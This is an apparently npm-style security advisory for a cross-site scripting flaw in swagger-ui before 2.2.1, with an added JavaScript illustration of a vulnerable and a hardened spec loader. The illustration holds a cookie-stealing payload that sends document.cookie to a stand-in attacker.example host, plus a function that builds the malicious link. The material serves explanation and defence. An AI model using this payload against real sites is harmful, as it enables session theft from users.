Description
Cross-Site Scripting in swagger-ui
Affected versions of swagger-ui are vulnerable to cross-site scripting (XSS). The vulnerability exists because swagger-ui automatically executes external JavaScript loaded from the location given in the url query string parameter whenever the response carries a Content-Type: application/javascript header.
An attacker can stand up a server that replies with a malicious script and that content type, then craft a swagger-ui URL whose url query string parameter points at their server/script. When a victim opens such a link, the attacker's script runs in the context of the swagger-ui page.
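The following is an added illustration of the bug class described above, not swagger-ui's own code and not its actual patch. It models a client-side spec loader that fetches whatever the url query parameter points at and executes the body when the server answers with Content-Type: application/javascript, alongside a hardened loader that allow-lists spec origins and only ever treats the body as JSON data. The hostnames (victim.example, api.example.com, attacker.example), the constructed responses and the allow-list are assumptions made for this example.

```javascript
'use strict';
// Added example (not swagger-ui code). Constructed stand-ins for what the
// network would return for each spec URL; the attacker's host answers with
// a script and the content type that the vulnerable loader trusts.
const RESPONSES = {
  'https://api.example.com/swagger.json': {
    headers: { 'content-type': 'application/json' },
    body: '{"swagger":"2.0","info":{"title":"Pets"}}',
  },
  'https://attacker.example/evil.js': {
    headers: { 'content-type': 'application/javascript' },
    body: 'location = "https://attacker.example/?c=" + document.cookie',
  },
};

// Offline replacement for fetch(); returns the constructed response.
function fakeFetch(url) {
  const r = RESPONSES[url];
  if (!r) throw new Error('no constructed response for ' + url);
  return r;
}

// Step 1 of the attack: build the link the victim is sent. The payload URL
// ends up percent-encoded inside the url query string parameter.
function craftAttackLink(swaggerUiBase, payloadUrl) {
  const u = new URL(swaggerUiBase);
  u.searchParams.set('url', payloadUrl);
  return u.toString();
}

// Vulnerable loader: mirrors the behaviour the advisory describes. A script
// Content-Type switches the loader from parsing a spec to executing the body,
// which in a real page means injecting it as <script> in the page origin (XSS).
function vulnerableLoad(pageHref) {
  const specUrl = new URL(pageHref).searchParams.get('url');
  const res = fakeFetch(specUrl);
  const ct = (res.headers['content-type'] || '').toLowerCase();
  if (ct.startsWith('application/javascript')) {
    return { action: 'executed-script', code: res.body };
  }
  return { action: 'parsed-spec', spec: JSON.parse(res.body) };
}

// Hardened loader (illustrative, not the project's fix): reject anything that
// is not an http(s) URL on an allow-listed origin, and never execute a
// response body; a spec is data, so only JSON is parsed, never evaluated.
function hardenedLoad(pageHref, allowedOrigins) {
  const specUrl = new URL(pageHref).searchParams.get('url');
  let parsed;
  try {
    parsed = new URL(specUrl);
  } catch (e) {
    return { action: 'rejected', reason: 'bad-url' };
  }
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') {
    return { action: 'rejected', reason: 'scheme-not-allowed' };
  }
  if (!allowedOrigins.includes(parsed.origin)) {
    return { action: 'rejected', reason: 'origin-not-allowed' };
  }
  const res = fakeFetch(specUrl);
  const ct = (res.headers['content-type'] || '').toLowerCase();
  if (!ct.startsWith('application/json')) {
    return { action: 'rejected', reason: 'unexpected-content-type' };
  }
  return { action: 'parsed-spec', spec: JSON.parse(res.body) };
}

const ATTACK_LINK = craftAttackLink(
  'https://victim.example/swagger-ui/index.html',
  'https://attacker.example/evil.js'
);
const BENIGN_LINK =
  'https://victim.example/swagger-ui/index.html?url=https://api.example.com/swagger.json';
const ALLOWED = ['https://api.example.com'];

module.exports = { craftAttackLink, vulnerableLoad, hardenedLoad, ATTACK_LINK, BENIGN_LINK, ALLOWED };
```

The allow-list check runs before any request is made, so the attacker's host is never contacted; the content-type check after the request is a second, independent gate for the case where an allow-listed origin is itself compromised.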
Recommendation
Update to 2.2.1 or later.
Packages
Name: swagger-ui (npm)
Affected versions: < 2.2.1
Fixed version: 2.2.1
CVE ID
Weaknesses: CWE-79
Related vulnerabilities
CVE ID
Weaknesses: CWE-79